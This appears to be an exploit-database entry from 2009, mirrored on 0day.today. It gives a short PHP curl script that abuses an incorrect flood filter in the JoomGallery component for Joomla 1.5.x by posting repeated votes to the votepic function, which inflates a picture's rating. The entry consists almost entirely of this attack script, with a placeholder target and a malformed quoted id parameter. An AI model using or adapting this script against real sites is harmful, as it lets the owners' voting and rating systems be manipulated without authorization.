id: 10079
date: 12/04/2009
title: Joomla 1.5.x com_joomgallery&func Incorrect Flood Filter
author: Jbyte
cves: 

========================================================
Joomla 1.5.x com_joomgallery&func Incorrect Flood Filter
========================================================

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://server/index.php?option=com_joomgallery&func=votepic&id="here id de voto"&Itemid=85");
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS,"imgvote=5&Votar%21=Votar%21");
curl_exec($ch);
 
curl_close($ch);
?>



#  0day.today [2023-03-25]  #